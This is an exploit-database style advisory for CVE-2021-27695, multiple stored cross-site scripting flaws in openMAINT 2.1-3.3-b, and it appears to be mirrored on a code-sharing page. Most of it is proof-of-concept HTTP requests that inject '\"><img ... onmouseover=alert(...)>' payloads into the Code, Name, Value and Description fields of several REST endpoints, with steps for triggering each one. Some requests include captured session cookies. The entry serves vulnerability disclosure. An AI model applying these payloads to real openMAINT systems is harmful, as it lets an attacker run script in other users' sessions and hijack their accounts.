扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 |
# Exploit Title: openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting # Date: 13/03/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://www.openmaint.org/ # Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/ # Version: 2.1-3.3 # Tested on: Linux # CVE: CVE-2021-27695 Summary: Multiple stored cross-site scripting (XSS) vulnerabilities in openMAINT 2.1-3.3-b allow remote attackers to inject arbitrary web script or HTML via any "Add" sections, such as Add Card Building & Floor, or others in the Name And Code Parameters. Proof of concepts : 1-Login to you'r Dashboard As a low privilege user 2-Click On Facilities and assets - Location - Sites 3- +Add card Building 4- Code and name parameters both are vulnerable POST /openmaint/services/rest/v3/classes/Building/cards?_dc=1615626728539 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json ..... Cookie: ... {"_type":"Building","_tenant":"","Code":"\"><img src=code onmouseover=alert(1)>","Description":null,"Name":"\"><img src=name onmouseover=alert(1)>",....} The Xss willtrigger in that form, and also if you click on "Map" button , the xss will trigger there ------------------------------------------------------------------------ Another Xss : 1-Like above in Facilities click on Locations and click on complex 2-click + Add card Complex 3-insert javascript payload to Code And Name POST /openmaint/services/rest/v3/classes/Complex/cards?_dc=1615627279082 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json .... Connection: close Referer: Cookie: .... {"_type":"Complex","_tenant":"","Code":"\"><img src=complex onmouseover=alert(1)>","Description":null,"Name":"\"><img src=complex onmouseover=alert(1)>",...} 4-Save it 5-Back to Sites and click on previous card 6- in position section click on "Complex" drop down 7- xss will trigger ------------------------------------------------------------------------ Another Xss: 1-Like exmaples above go to Locations and click on Sites 2-Add Card Building or clickthe one you created before 3-in left menu click on "Relations" 4-click "Add relations" and select one of the options 5- Add Card and select one of the options 6- insert javascript payload to code and name parameter POST /openmaint/services/rest/v3/classes/Alarm/cards?_dc=1615628392695 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Connection: close Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 {"_type":"","_tenant":"","Code":"\"><img src=add relation onmouseover=alert(3)>","Name":"\"><img src=add relation onmouseover=alert(3)>","Description":null,..... } 7- save it and close the form 8-click on the card and there an option which is "Open Relation Graph" click on it and click on card list 9- xss payload will trigger ------------------------------------------------------ Another Xss: 1- In "Navigation" Bar click on "Configurations" 2- Click on parameter 3- + Add card Parameter 4- Insert javascript payload to Code and Value PUT /openmaint/services/rest/v3/classes/Parameter/cards/385606?_dc=1615629885175 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 {"_type":"Parameter","_tenant":"","Area":null,"Code":"--'\"><img src=cardparameter onmouseover=alert(4)>","Description":null,"Value":"--'\"><img src=cardparameter onmouseover=alert(5)>",....} save it and like the previous one click on "Open Relation Graph" and in card List your xss will trigger ------------------------------------------------------- Another Xss: 1-Click Facilities and assets 2-Locations 3-Select one of cards 4-Click "Add Card" 5-in "Attachments" tab click "Add attachment" select "Document" or "image" 6-insert javascript payload in "Code" and "Description" PUT /openmaint/services/rest/v3/classes/Complex/cards/384220/attachments/apovsxflx4j269tx08h1eoayg2vn9eyhbfh06079bm37cr7uk63l75oetcmzc1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate CMDBuild-ActionId: class.card.attachments.open CMDBuild-RequestId: 52807186-932d-448b-bfe3-8a51b596bcb8 Content-Type: multipart/form-data; boundary=---------------------------1049383330380851725139941543 Content-Length: 1020 Connection: close Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 -----------------------------1049383330380851725139941543 Content-Disposition: form-data; name="attachment"; filename="blob" Content-Type: application/json {"_....."Code":"--'\"><img src=attach onmouseover=alert(7)>","Description":"--'\"><img src=attach onmouseover=alert(7)>","...} -----------------------------1049383330380851725139941543-- 7-save it and xss will trigger |
体验盒子
